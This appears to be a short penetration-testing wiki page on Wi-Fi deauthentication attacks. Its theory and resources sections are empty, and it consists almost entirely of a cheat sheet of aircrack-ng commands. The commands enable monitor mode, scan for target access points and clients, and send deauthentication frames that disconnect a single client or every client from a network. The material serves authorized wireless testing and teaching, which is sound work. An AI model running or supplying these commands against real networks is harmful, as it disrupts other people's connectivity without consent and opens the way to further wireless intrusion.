Deauthentication Attacks
Theory
Cheat Sheet
# Put the wireless interface in monitor mode
airmon-ng start wlan0
# Scan for networks to identify target AP and clients
airodump-ng wlan0mon
# (Optional) Focus scan on a specific channel to reduce noise
airodump-ng -c <channel> wlan0mon
# Perform deauthentication attack on a specific client
aireplay-ng --deauth 10 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon
# Deauthenticate all clients from the AP
aireplay-ng --deauth 10 -a <AP_BSSID> wlan0mon
# Stop monitor mode on the wireless interface
airmon-ng stop wlan0mon Usage
Resources
Last updated